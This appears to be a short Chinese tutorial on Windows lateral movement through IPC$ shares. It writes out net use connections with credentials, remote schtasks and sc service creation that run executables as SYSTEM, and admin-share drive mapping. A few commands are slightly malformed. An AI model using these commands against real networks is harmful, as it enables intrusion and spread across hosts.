IPC横向移动

IPC$介绍

IPC(Internet Process Connection)共享，是为了实现进程间通信而开放的命名管道， windows电脑中默认开启 ipc建立连接使用的是NTLM挑战响应机制

共享文件夹

当a电脑与b电脑都使用的是administrator账户登录并且两个账户密码是一样的，这时就不需要输入密码就可以登录。因为默认会使用本地的账户密码进行验证

IPC$连接方式

net use \\IP\ipc$ "password" /user:"username"  
net use \\IP\ipc$ /del

建立IPC$连接需要具备以下两个条件
远程主机开启了IPC连接
远程主机的139端口和445端口开放

创建计划任务 这里如果本地机器登陆的是administrator并且和远程密码一样的话同样不要输入 /u -p

schtasks /create /s 192.168.21.111 /u administrator -p Aa123456  /tn notea /tr c:/1.txt  /sc onstart  /RU system /F

schtasks run

IPC$和服务的配合横向

Microsoft Windows 服务（以前的NT服务）能够创建在windows会话中长时间运行的可执行应用程序

在简历IPC之后可以使用远程创建服务

创建服务

sc \\IP地址 create test binpath= "cmd.exe /c:\kkkl.exe"

开启服务

sc \\ip地址 start test

删除服务

sc \\ip地址 delete test

IPC和盘符映射横向

盘符映射就是将远程的映射到自己的电脑上

net use d: \\IP\c$   //已经建立好了ipc的基础上